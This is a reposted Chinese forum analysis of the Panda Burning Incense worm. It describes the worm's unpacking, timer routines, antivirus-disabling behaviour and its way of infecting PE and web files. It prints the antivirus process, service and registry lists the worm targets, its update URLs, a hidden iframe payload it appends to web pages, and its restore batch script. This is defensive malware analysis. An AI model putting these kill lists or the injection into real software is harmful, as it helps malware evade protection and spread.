OD分析-熊猫烧香
轉載自看雪論壇-暗夜之刃大神
https://bbs.pediy.com/thread-224773.htm
目錄
0x01 分析注意事項-分析工具
0x02 病毒信息
0x03 病毒行為
0x04 脫殼
0x05 病毒初始化分析
0x06 Proc_時鐘1 (時鐘周期: 6000ms)
0x07 Proc_時鐘2 (時鐘周期: 1000ms)
0x08 Proc_時鐘3 (時鐘周期: 120000ms)
0x09 Proc_時鐘4 (時鐘周期: 10000ms)
0x10 Proc_時鐘5 (時鐘周期: 6000ms)
0x11 Proc_時鐘6 (時鐘周期: 10000ms)
0x12 Proc_時鐘7 (時鐘周期: 180000ms)
0x13 感染線程分析
0x14 具體感染流程分析
0x15 感染后程序的運行
0x01 分析注意事項-分析工具
(1) 這個病毒在xp系統分析比較好, Win7_64位下 “C:\WINDOWS\system32\drivers\” 目錄不能運行程序.
<我在這里耽誤了很長的時間, 病毒分析要盡量確定病毒運行的環境, 很多病毒是在特定的環境中運行>
(2) 兩個很重要的API, 時鐘回調 && 線程回調 都需要分析.
SetTimer: 病毒經常用時鐘來定時結束指定進程.
CreateThread: 執行其他的代碼分支, 感染PE文件的代碼就是用線程執行的.
(3) IDA 的簽名功能,能夠識別很多的函數來進行輔助分析.
分析工具
火絨劍: 敏感行為檢測很不錯, OD動態調試時用來輔助分析函數功能很好用.
OD, IDA, 010Editor:
BCompare: 十六進制對比感染前與感染后的程序
PE類工具: 查殼 && 編程語言識別.
0x02 病毒信息
(1) 文件大小: 30,001字節
(2) MD5; 512301C535C88255C9A252FDF70B7A03
(3) 殼: FSG v2.0
(4) 編寫語言: Delphi
0x03 病毒行為
(1) 寫啟動項
(2) 關閉服務
(3) 感染PE文件
(4) 訪問指定網址, 判斷是否需要更新
(5) 釋放文件, 并設置文件屬性為<隱藏|系統>
(6) 提升進程權限
(7) 遍歷窗口名, 向指定窗口名發送QUIT消息, 并結束指定進程
0x04 脫殼
(1) 查殼
(1) 執行到OEP 處, 然后 dump文件.
(2) 修復IAT 表的結尾, 然后在使用 ImpREC 工具修復輸入表即可脫殼成功.
0x05 病毒初始化分析
(1) 判斷字符串是否被修改
(2) 最重要的3個函數
(3) 判斷Desktop_.ini 是否存在
(4) 將自身讀入到內存中
(5) 將 "C:\WINDOWS\system32\drivers\spo0lsv.exe" 轉為大寫后, 和自身路徑對比
(6) 如果不在 "C:\WINDOWS\system32\drivers\spo0lsv.exe" 處運行, 則將自身復制到 "C:\WINDOWS\system32\drivers\spo0lsv.exe"
運行 "C:\WINDOWS\system32\drivers\spo0lsv.exe", 并結束自身
0x06 Proc_時鐘1 (時鐘周期: 6000ms)
(1) 判斷是否需要釋放文件
(2) 遍歷磁盤, 將自身復制到 盤符:\setup.exe
(3) 遍歷磁盤, 創建 盤符:\autorun.inf 文件
(4)設置setup.exe 文件屬性為, <系統,隱藏>
(5)設置autorun.inf 文件屬性為, <系統,隱藏>
(6) 寫配置項
0x07 Proc_時鐘2 (時鐘周期: 1000ms)
(1) 提升進程權限
(2) 遍歷窗口名, 向指定窗口名發送QUIT消息, 并結束指定進程
查找的窗口列表:
防火墻,進程,VirusScan,NOD32,網鏢,殺毒,毒霸,瑞星,江民,超級兔子,優化大師,木馬清道夫,木馬清道夫,卡巴斯基反病毒
Symantec AntiVirus,Duba,esteem procs,綠鷹PC,密碼防盜,噬菌體,木馬輔助查找器,System Safety Monitor,Wrapped giftKiller
Winsock Expert,游戲木馬檢測大師,超級巡警,msctls_statusbar32,pjf(ustc),IceSword,
結束的進程列表:
Mcshield.exe,VsTskMgr.exe,naPrdMgr.exe,UpdaterUI.ex,TBMon.exe,scan32.exe,Ravmond.exe,CCenterexe,RavTask.exe,Rav.exe,
Ravmon.exe,RavmonD.exe,RavStub.exe,KVXP.kxp,KvMonXP.kxp,KVCenter.kxp,KVSrvXP.exe,KRegEx.exe,UIHost.exe,TrojDiekxp,
FrogAgent.exe,Logo1_.exe,Logo_1.exe,Rundl132.exe,regedit.exe,msconfig.exe,taskmgr.exe
(3) 寫啟動項
(4) 設置隱藏的文件和文件夾,不可見
0x08 Proc_時鐘3 (時鐘周期: 120000ms)
(1) 通過 “http://www.ac86.cn/66/up.txt” 這個地址來更新, 網址已經失效了
0x09 Proc_時鐘4 (時鐘周期: 10000ms)
(1) 遍歷磁盤, 關閉共享
(2) 關閉admin的共享
(3) 殺死當前時鐘
0x10 Proc_時鐘5 (時鐘周期: 6000ms)
(1) 將殺毒軟件的注冊表啟動項設置為失效, 設置值為2, 被針對的殺毒軟件注冊表啟動項列表如下:
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkAssociates Error Reporting Service"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse"
(2) 使用兩種方式停止服務程序, 被停止的列表如下:
"sharedaccess","RsCCenter","RsRavMon","KVWSC" ,"KVSrvXP","kavsvc","AVP"
"McAfeeFramework","McShield","McTaskManager","navapsvc","wscsvc","KPfwSvc"
"KPfwSvc","ccProxy","ccProxy","ccProxy","SPBBCSvc","Symantec Core LC"
"NPFMntor","NPFMntor","FireSvc"
0x11 Proc_時鐘6 (時鐘周期: 10000ms)
() 會獲取這些網站的網頁源碼:
"http://www.tom.com"
"http://www.163.com"
"http://www.sohu.com"
"http://www.yahoo.com"
"http://www.google.com"
0x12 Proc_時鐘7 (時鐘周期: 180000ms)
(1) 通過 “http://update.whboy.net/worm.txt” 這個地址來更新, 網址已經失效了
0x13 感染線程分析
(1) 感染線程回調函數
(2) 獲取所有磁盤名
(3) 遍歷磁盤_感染目標
(4) 感染的文件類型為: "EXE", "SRC", "PIF", "COM"
(5) 在網頁文件 "html", "asp", "php", "jsp", "aspx" 的尾部加上 <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>.
0x14 具體感染流程分析
(1) 讀入目標文件
(2) 從將要感染程序中查找 "WhBoy", 找到則說明已經被感染了
(3) 設置目標文件屬性為 “NORMAL”
(4) 將自身復制為目標文件
(5) 將目標程序追加到病毒后面
(6) 感染后的標志為 “WhBoy” + 被感染程序名 + “.exe”
0x15 感染后程序的運行
(1) <感染后程序> 的結構,
(2) 判斷是否被感染, 感染則跳轉
(3) 創建 自身進程名 + “.exe”文件
(4) 從自身中提取 <源程序> 并寫到 “BeInfected.exe.exe”
(5) 在 Temp目錄 寫批處理 并 運行批處理
批處理內容:
//循環刪除自身, 直至刪除成功:try1
?
del "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
?
if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe" goto try1
?
//將 BeInfected.exe.exe 修改為 BeInfected.exe, 并運行 BeInfected.exe.
?
ren "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" "BeInfected.exe"
?
if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" goto try2
?
"C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
?
:try2
?
del %0
執行生成的批處理
(6) <感染后程序> 就被還原成 <源程序> 了, 并運行 <源程序>.
(1) 有什么錯誤請大神們指出.
(2) 并感謝15PB老師們的幫助和教導.
轉載于:https://www.cnblogs.com/ltyandy/p/11332090.html
總結
- 上一篇: 史蒂夫 乔布斯:遗失的访谈
- 下一篇: 外挂原理